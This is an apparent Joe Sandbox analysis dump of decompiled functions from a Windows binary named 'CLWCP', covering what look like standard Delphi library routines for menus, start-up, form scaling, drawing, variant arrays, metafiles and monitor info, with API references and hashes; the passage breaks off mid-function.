                                  • API String ID: 1976014923-0
                                  • Opcode ID: 3546f373e83fc68d7760aece48239dfa81fbd341cad409d09d2690410578dded
                                  • Instruction ID: cfd5595485f10f58d79b5b626d758ba1910fda7a512c8ffe6aacfc0aa1e278e3
                                  • Opcode Fuzzy Hash: 3546f373e83fc68d7760aece48239dfa81fbd341cad409d09d2690410578dded
                                  • Instruction Fuzzy Hash: 2C910A74A10208AFDB04EF99C485BEEBBF8AF48314F1540A6E904EB396D779ED40CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004514B8(intOrPtr _a4) {
                                  				intOrPtr _t27;
                                  				struct HMENU__* _t48;
                                  
                                  				_t27 =  *((intOrPtr*)(_a4 - 4));
                                  				if( *((char*)(_t27 + 0x241)) != 0) {
                                  					_t27 =  *((intOrPtr*)(_a4 - 4));
                                  					if(( *(_t27 + 0x240) & 0x00000001) != 0) {
                                  						_t27 =  *((intOrPtr*)(_a4 - 4));
                                  						if( *((char*)(_t27 + 0x247)) != 1) {
                                  							_t48 = GetSystemMenu(E0043BA58( *((intOrPtr*)(_a4 - 4))), 0);
                                  							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x241)) == 3) {
                                  								DeleteMenu(_t48, 0xf130, 0);
                                  								DeleteMenu(_t48, 7, 0x400);
                                  								DeleteMenu(_t48, 5, 0x400);
                                  								DeleteMenu(_t48, 0xf030, 0);
                                  								DeleteMenu(_t48, 0xf020, 0);
                                  								DeleteMenu(_t48, 0xf000, 0);
                                  								return DeleteMenu(_t48, 0xf120, 0);
                                  							}
                                  							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x240) & 0x00000002) == 0) {
                                  								EnableMenuItem(_t48, 0xf020, 1);
                                  							}
                                  							_t27 =  *((intOrPtr*)(_a4 - 4));
                                  							if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                  								return EnableMenuItem(_t48, 0xf030, 1);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t27;
                                  			}

                                  APIs
                                  • GetSystemMenu.USER32(00000000,00000000), ref: 00451503
                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00451521
                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045152E
                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045153B
                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00451548
                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00451555
                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00451562
                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0045156F
                                  • EnableMenuItem.USER32 ref: 0045158D
                                  • EnableMenuItem.USER32 ref: 004515A9
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Menu$Delete$EnableItem$System
                                  • String ID:
                                  • API String ID: 3985193851-0
                                  • Opcode ID: 6c093225d095ab61fa18efbb44118406cc5f423406637c70e94709c6b4b5f515
                                  • Instruction ID: 3de494a1271458e31ffeb08a7330e898f60accc18c083eba1e8a3f962a69d976
                                  • Opcode Fuzzy Hash: 6c093225d095ab61fa18efbb44118406cc5f423406637c70e94709c6b4b5f515
                                  • Instruction Fuzzy Hash: 782121707813447BE731EB25CC8EF597AD89B04719F0540A6BA4A7F2D3C6B8EA94861C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405D99(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edx, intOrPtr* __edi, void* __esi) {
                                  				long _t14;
                                  				signed int _t15;
                                  				void* _t19;
                                  
                                  				_t19 = __ebx;
                                  				 *__edi =  *__edi + __ecx;
                                  				 *__edx =  *__edx + (__eax - 0x004705b8 | __eax - 0x004705b8);
                                  				 *0x470014 = 0x4011fc;
                                  				 *0x470018 = 0x401204;
                                  				 *0x47004a = 2;
                                  				 *0x470000 = E00404EE8;
                                  				if(E004031E0() != 0) {
                                  					_t5 = E00403210();
                                  				}
                                  				E004032D4(_t5);
                                  				 *0x470050 = 0xd7b0;
                                  				 *0x47021c = 0xd7b0;
                                  				 *0x4703e8 = 0xd7b0;
                                  				 *0x47003c = GetCommandLineA();
                                  				 *0x470038 = E00401324();
                                  				if((GetVersion() & 0x80000000) == 0x80000000) {
                                  					E00405CD0(GetThreadLocale(), _t19, __eflags);
                                  				} else {
                                  					_t15 = GetVersion();
                                  					_t28 = (_t15 & 0x000000ff) - 4;
                                  					if((_t15 & 0x000000ff) <= 4) {
                                  						E00405CD0(GetThreadLocale(), _t19, _t28);
                                  					}
                                  				}
                                  				 *0x4705bc = GetACP();
                                  				_t14 = GetCurrentThreadId();
                                  				 *0x470030 = _t14;
                                  				return _t14;
                                  			}







                                  APIs
                                    • Part of subcall function 004031E0: GetKeyboardType.USER32(00000000), ref: 004031E5
                                    • Part of subcall function 004031E0: GetKeyboardType.USER32(00000001), ref: 004031F1
                                  • GetCommandLineA.KERNEL32 ref: 00405DFF
                                  • GetVersion.KERNEL32 ref: 00405E13
                                  • GetVersion.KERNEL32 ref: 00405E24
                                  • GetThreadLocale.KERNEL32 ref: 00405E34
                                  • GetThreadLocale.KERNEL32 ref: 00405E40
                                    • Part of subcall function 00405CD0: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00405D36), ref: 00405CF6
                                  • GetACP.KERNEL32 ref: 00405E4A
                                  • GetCurrentThreadId.KERNEL32 ref: 00405E54
                                    • Part of subcall function 00403210: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403232
                                    • Part of subcall function 00403210: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403281,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403265
                                    • Part of subcall function 00403210: RegCloseKey.ADVAPI32(?,00403288,00000000,?,00000004,00000000,00403281,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040327B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: LocaleThread$KeyboardTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                  • String ID: 05`
                                  • API String ID: 3238385485-883531628
                                  • Opcode ID: 15291bd8ff136a1fa5aa7d102e8022207f8918c4615f7f3f5a8b86ad117b14ae
                                  • Instruction ID: 54f323300690bf0135cd5641502173b618e665e6d092991e8fe108ec1946a72a
                                  • Opcode Fuzzy Hash: 15291bd8ff136a1fa5aa7d102e8022207f8918c4615f7f3f5a8b86ad117b14ae
                                  • Instruction Fuzzy Hash: 9701EDB4446781C5E750FFB6A44A3497A60BB01318F10547FD548BA2F2EB3C4184DF6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004347A8(intOrPtr* __eax, int __ecx, int __edx) {
                                  				signed int _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				int _v32;
                                  				signed int _t70;
                                  				signed int _t74;
                                  				signed int _t75;
                                  				int _t76;
                                  				int _t116;
                                  				intOrPtr* _t117;
                                  				int _t118;
                                  
                                  				_t118 = __ecx;
                                  				_t116 = __edx;
                                  				_t117 = __eax;
                                  				if(__ecx == __edx) {
                                  					L29:
                                  					_t70 =  *0x434950 & 0x000000ff;
                                  					 *(_t117 + 0x98) = _t70;
                                  					return _t70;
                                  				}
                                  				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
                                  					_v20 =  *0x434948 & 0x000000ff;
                                  				} else {
                                  					_v20 =  *(__eax + 0x98) & 0x000000ff;
                                  				}
                                  				if((_v20 & 0x00000001) == 0) {
                                  					_v32 =  *(_t117 + 0x40);
                                  				} else {
                                  					_v32 = MulDiv( *(_t117 + 0x40), _t116, _t118);
                                  				}
                                  				if((_v20 & 0x00000002) == 0) {
                                  					_v28 =  *(_t117 + 0x44);
                                  				} else {
                                  					_v28 = MulDiv( *(_t117 + 0x44), _t116, _t118);
                                  				}
                                  				if((_v20 & 0x00000004) == 0 || ( *(_t117 + 0x51) & 0x00000001) != 0) {
                                  					_t74 =  *(_t117 + 0x48);
                                  					_v24 = _t74;
                                  				} else {
                                  					if((_v20 & 0x00000001) == 0) {
                                  						_t74 = MulDiv( *(_t117 + 0x48), _t116, _t118);
                                  						_v24 = _t74;
                                  					} else {
                                  						_t74 = MulDiv( *(_t117 + 0x40) +  *(_t117 + 0x48), _t116, _t118) - _v32;
                                  						_v24 = _t74;
                                  					}
                                  				}
                                  				_t75 = _t74 & 0xffffff00 | (_v20 & 0x00000008) != 0x00000000;
                                  				if(_t75 == 0 || ( *(_t117 + 0x51) & 0x00000002) != 0) {
                                  					_t76 =  *(_t117 + 0x4c);
                                  				} else {
                                  					if(_t75 == 0) {
                                  						_t76 = MulDiv( *(_t117 + 0x44), _t116, _t118);
                                  					} else {
                                  						_t76 = MulDiv( *(_t117 + 0x44) +  *(_t117 + 0x4c), _t116, _t118) - _v28;
                                  					}
                                  				}
                                  				 *((intOrPtr*)( *_t117 + 0x88))(_t76, _v24);
                                  				if(( *0x434950 & 0x000000ff) != (_v28 & 0x000000ff &  *0x43494c)) {
                                  					 *(_t117 + 0x90) = MulDiv( *(_t117 + 0x90), _t116, _t118);
                                  				}
                                  				if(( *0x434950 & 0x000000ff) != (_v28 & 0x000000ff &  *0x434954)) {
                                  					 *(_t117 + 0x94) = MulDiv( *(_t117 + 0x94), _t116, _t118);
                                  				}
                                  				if( *((char*)(_t117 + 0x59)) == 0 && (_v28 & 0x00000010) != 0) {
                                  					E0041D91C( *((intOrPtr*)(_t117 + 0x68)), MulDiv(E0041D900( *((intOrPtr*)(_t117 + 0x68))), _t116, _t118));
                                  				}
                                  				goto L29;
                                  			}















                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56931724dcda79bfd0f7aaa59a5e01eca36d7d9782fb091460afa16a3d026c34
                                  • Instruction ID: 1fc98fae844862559d15c66ebb5674b268fcf622485d520ad882a022b5c2aba5
                                  • Opcode Fuzzy Hash: 56931724dcda79bfd0f7aaa59a5e01eca36d7d9782fb091460afa16a3d026c34
                                  • Instruction Fuzzy Hash: 225186740087946EC311EB7AC444BA7BFE89F8A318F058C5EB5D583392C679F854CB19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E004356EC(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				char _v5;
                                  				struct HDC__* _v12;
                                  				struct HDC__* _v16;
                                  				void* _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				int _v32;
                                  				int _v36;
                                  				struct HDC__* _t33;
                                  				intOrPtr _t72;
                                  				int _t74;
                                  				intOrPtr _t80;
                                  				int _t83;
                                  				void* _t88;
                                  				int _t89;
                                  				void* _t92;
                                  				void* _t93;
                                  				intOrPtr _t94;
                                  
                                  				_t92 = _t93;
                                  				_t94 = _t93 + 0xffffffe0;
                                  				_v5 = __ecx;
                                  				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
                                  				if(_v5 == 0) {
                                  					_push(__edx);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_pop(_t88);
                                  				} else {
                                  					_push(__edx);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_pop(_t88);
                                  				}
                                  				_v12 = GetDesktopWindow();
                                  				_push(0x402);
                                  				_push(0);
                                  				_t33 = _v12;
                                  				_push(_t33);
                                  				L004066EC();
                                  				_v16 = _t33;
                                  				_push(_t92);
                                  				_push(0x435807);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t94;
                                  				_v20 = SelectObject(_v16, E0041DEAC( *((intOrPtr*)(_t88 + 0x48))));
                                  				_t89 = _v36;
                                  				_t83 = _v32;
                                  				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
                                  				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
                                  				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
                                  				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
                                  				SelectObject(_v16, _v20);
                                  				_pop(_t80);
                                  				 *[fs:eax] = _t80;
                                  				_push(0x43580e);
                                  				_push(_v16);
                                  				_t72 = _v12;
                                  				_push(_t72);
                                  				L00406944();
                                  				return _t72;
                                  			}






















                                  APIs
                                  • GetDesktopWindow.USER32 ref: 00435723
                                  • 72E7ACE0.USER32(?,00000000,00000402), ref: 00435736
                                  • SelectObject.GDI32(?,00000000), ref: 00435759
                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043577F
                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 004357A1
                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004357C0
                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 004357DA
                                  • SelectObject.GDI32(?,?), ref: 004357E7
                                  • 72E7B380.USER32(?,?,0043580E,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 00435801
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$B380DesktopWindow
                                  • String ID:
                                  • API String ID: 989747725-0
                                  • Opcode ID: 7137ccb6e6b6f62579c3824a55f0694aa0326d658da7c6cc908ac4b921500ed8
                                  • Instruction ID: f693f7ae5b565339ae0f3290a747a3312923528edfbd380095b06e5f322145e6
                                  • Opcode Fuzzy Hash: 7137ccb6e6b6f62579c3824a55f0694aa0326d658da7c6cc908ac4b921500ed8
                                  • Instruction Fuzzy Hash: E331E7B6E00619BFDB00DEADCC85DAFBBBCAF49714B014469B514F7241C679AD048B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E0040ECE0(short* __eax, intOrPtr __ecx, signed short* __edx) {
                                  				char _v260;
                                  				char _v768;
                                  				char _v772;
                                  				short* _v776;
                                  				intOrPtr _v780;
                                  				char _v784;
                                  				signed int _v788;
                                  				signed short* _v792;
                                  				char _v796;
                                  				char _v800;
                                  				intOrPtr* _v804;
                                  				void* __ebp;
                                  				signed char _t47;
                                  				signed int _t54;
                                  				void* _t62;
                                  				intOrPtr* _t73;
                                  				signed short* _t91;
                                  				void* _t93;
                                  				void* _t95;
                                  				void* _t98;
                                  				void* _t99;
                                  				intOrPtr* _t108;
                                  				void* _t112;
                                  				intOrPtr _t113;
                                  				char* _t114;
                                  				void* _t115;
                                  
                                  				_t100 = __ecx;
                                  				_v780 = __ecx;
                                  				_t91 = __edx;
                                  				_v776 = __eax;
                                  				if(( *(__edx + 1) & 0x00000020) == 0) {
                                  					E0040E90C(0x80070057);
                                  				}
                                  				_t47 =  *_t91 & 0x0000ffff;
                                  				if((_t47 & 0x00000fff) != 0xc) {
                                  					_push(_t91);
                                  					_push(_v776);
                                  					L0040D6BC();
                                  					return E0040E90C(_v776);
                                  				} else {
                                  					if((_t47 & 0x00000040) == 0) {
                                  						_v792 = _t91[4];
                                  					} else {
                                  						_v792 =  *(_t91[4]);
                                  					}
                                  					_v788 =  *_v792 & 0x0000ffff;
                                  					_t93 = _v788 - 1;
                                  					if(_t93 < 0) {
                                  						L9:
                                  						_push( &_v772);
                                  						_t54 = _v788;
                                  						_push(_t54);
                                  						_push(0xc);
                                  						L0040DB14();
                                  						_t113 = _t54;
                                  						if(_t113 == 0) {
                                  							E0040E664(_t100);
                                  						}
                                  						E0040EC38(_v776);
                                  						 *_v776 = 0x200c;
                                  						 *((intOrPtr*)(_v776 + 8)) = _t113;
                                  						_t95 = _v788 - 1;
                                  						if(_t95 < 0) {
                                  							L14:
                                  							_t97 = _v788 - 1;
                                  							if(E0040EC54(_v788 - 1, _t115) != 0) {
                                  								L0040DB2C();
                                  								E0040E90C(_v792);
                                  								L0040DB2C();
                                  								E0040E90C( &_v260);
                                  								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                  							}
                                  							_t62 = E0040EC84(_t97, _t115);
                                  						} else {
                                  							_t98 = _t95 + 1;
                                  							_t73 =  &_v768;
                                  							_t108 =  &_v260;
                                  							do {
                                  								 *_t108 =  *_t73;
                                  								_t108 = _t108 + 4;
                                  								_t73 = _t73 + 8;
                                  								_t98 = _t98 - 1;
                                  							} while (_t98 != 0);
                                  							do {
                                  								goto L14;
                                  							} while (_t62 != 0);
                                  							return _t62;
                                  						}
                                  					} else {
                                  						_t99 = _t93 + 1;
                                  						_t112 = 0;
                                  						_t114 =  &_v772;
                                  						do {
                                  							_v804 = _t114;
                                  							_push(_v804 + 4);
                                  							_t18 = _t112 + 1; // 0x1
                                  							_push(_v792);
                                  							L0040DB1C();
                                  							E0040E90C(_v792);
                                  							_push( &_v784);
                                  							_t21 = _t112 + 1; // 0x1
                                  							_push(_v792);
                                  							L0040DB24();
                                  							E0040E90C(_v792);
                                  							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                  							_t112 = _t112 + 1;
                                  							_t114 = _t114 + 8;
                                  							_t99 = _t99 - 1;
                                  						} while (_t99 != 0);
                                  						goto L9;
                                  					}
                                  				}
                                  			}





























                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040ED79
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040ED95
                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040EDCE
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040EE4B
                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040EE64
                                  • VariantCopy.OLEAUT32(?), ref: 0040EE99
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                  • String ID:
                                  • API String ID: 351091851-3916222277
                                  • Opcode ID: 669d459abd602cc05d154e15c16596846c75436064cf725d98525ad0c6030072
                                  • Instruction ID: 746a03922ea78402e18e7f841221551199bbce028f608486c49ce08cd7d96be1
                                  • Opcode Fuzzy Hash: 669d459abd602cc05d154e15c16596846c75436064cf725d98525ad0c6030072
                                  • Instruction Fuzzy Hash: 6F510D7590022D9BCB61DB5AC881BD9B3BCAF4C304F4045EAE508F7252D638AF958F65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E004211AC(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				int _v12;
                                  				BYTE* _v16;
                                  				intOrPtr _v18;
                                  				signed int _v24;
                                  				short _v26;
                                  				short _v28;
                                  				short _v30;
                                  				short _v32;
                                  				char _v38;
                                  				struct tagMETAFILEPICT _v54;
                                  				intOrPtr _v118;
                                  				intOrPtr _v122;
                                  				struct tagENHMETAHEADER _v154;
                                  				intOrPtr _t103;
                                  				intOrPtr _t115;
                                  				struct HENHMETAFILE__* _t119;
                                  				struct HENHMETAFILE__* _t120;
                                  				void* _t122;
                                  				void* _t123;
                                  				void* _t124;
                                  				void* _t125;
                                  				intOrPtr _t126;
                                  
                                  				_t124 = _t125;
                                  				_t126 = _t125 + 0xffffff68;
                                  				_v12 = __ecx;
                                  				_v8 = __edx;
                                  				_t122 = __eax;
                                  				E00421048(__eax);
                                  				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
                                  				if(_v38 != 0x9ac6cdd7 || E0041FA3C( &_v38) != _v18) {
                                  					E0041EBCC();
                                  				}
                                  				_v12 = _v12 - 0x16;
                                  				_v16 = E004026E4(_v12);
                                  				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                  				 *[fs:eax] = _t126;
                                  				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x42131b, _t124);
                                  				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24 & 0x0000ffff;
                                  				if(_v24 == 0) {
                                  					_v24 = 0x60;
                                  				}
                                  				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                  				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                  				_v54.mm = 8;
                                  				_v54.xExt = 0;
                                  				_v54.yExt = 0;
                                  				_v54.hMF = 0;
                                  				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                  				 *(_t103 + 8) = _t119;
                                  				if(_t119 == 0) {
                                  					E0041EBCC();
                                  				}
                                  				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                                  				_v54.mm = 8;
                                  				_v54.xExt = _v122;
                                  				_v54.yExt = _v118;
                                  				_v54.hMF = 0;
                                  				DeleteEnhMetaFile( *(_t103 + 8));
                                  				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                  				 *(_t103 + 8) = _t120;
                                  				if(_t120 == 0) {
                                  					E0041EBCC();
                                  				}
                                  				 *((char*)(_t122 + 0x2c)) = 0;
                                  				_pop(_t115);
                                  				 *[fs:eax] = _t115;
                                  				_push(0x421322);
                                  				return E00402704(_v16);
                                  			}

                                  APIs
                                  • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042124E
                                  • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042126B
                                  • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00421297
                                  • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 004212B7
                                  • DeleteEnhMetaFile.GDI32(00000016), ref: 004212D8
                                  • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 004212EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileMeta$Bits$DeleteHeader
                                  • String ID: `
                                  • API String ID: 1990453761-2679148245
                                  • Opcode ID: cb062cd4891fbcb137a75973799cd9d647f3313e77a495df328eb17fd730aaa3
                                  • Instruction ID: 3f46e23d36fc50193aef999eb47405748200aa2edc5945a1fbc22915a1868693
                                  • Opcode Fuzzy Hash: cb062cd4891fbcb137a75973799cd9d647f3313e77a495df328eb17fd730aaa3
                                  • Instruction Fuzzy Hash: A6411B75A00218EFDB00DFA9D885AAEB7F9EF48710F51846AF904F7251E7399D40CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E00425588(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                                  				void _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t23;
                                  				int _t24;
                                  				struct HMONITOR__* _t27;
                                  				struct tagMONITORINFO* _t29;
                                  				intOrPtr* _t31;
                                  
                                  				_t29 = _a8;
                                  				_t27 = _a4;
                                  				if( *0x470930 != 0) {
                                  					_t24 = 0;
                                  					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                  						_t29->rcMonitor.left = 0;
                                  						_t29->rcMonitor.top = 0;
                                  						_t29->rcMonitor.right = GetSystemMetrics(0);
                                  						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t31 = _t29;
                                  						 *(_t31 + 0x24) = 1;
                                  						if( *_t31 >= 0x4c) {
                                  							_push("DISPLAY");
                                  							_push(_t31 + 0x28);
                                  							L0040632C();
                                  						}
                                  						_t24 = 1;
                                  					}
                                  				} else {
                                  					 *0x470914 = E0042525C(4, _t23,  *0x470914, _t27, _t29);
                                  					_t24 = GetMonitorInfoA(_t27, _t29);
                                  				}
                                  				return _t24;
                                  			}

                                  APIs
                                  • GetMonitorInfoA.USER32(?,?), ref: 004255B9
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004255E0
                                  • GetSystemMetrics.USER32 ref: 004255F5
                                  • GetSystemMetrics.USER32 ref: 00425600
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042562A
                                    • Part of subcall function 0042525C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004252DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfo
                                  • API String ID: 1539801207-1633989206
                                  • Opcode ID: 5b6dd8dcad5299ba622ed3271e060dc4bbf34aaf4f643ccc913a623c0b54b73d
                                  • Instruction ID: edb674aab8ac305ead081728a3e1ddce560f0fb8423e560594da60aa40b72e09
                                  • Opcode Fuzzy Hash: 5b6dd8dcad5299ba622ed3271e060dc4bbf34aaf4f643ccc913a623c0b54b73d
                                  • Instruction Fuzzy Hash: FD11E7B1702714AFE720CF60AC4476BB7E4EB45710F80053AED4DD7241D3B4A8408BAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E0042565C(intOrPtr _a4, intOrPtr* _a8) {
                                  				void _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t23;
                                  				int _t24;
                                  				intOrPtr _t26;
                                  				intOrPtr _t27;
                                  				intOrPtr* _t29;
                                  				intOrPtr* _t31;
                                  
                                  				_t29 = _a8;
                                  				_t27 = _a4;
                                  				if( *0x470931 != 0) {
                                  					_t24 = 0;
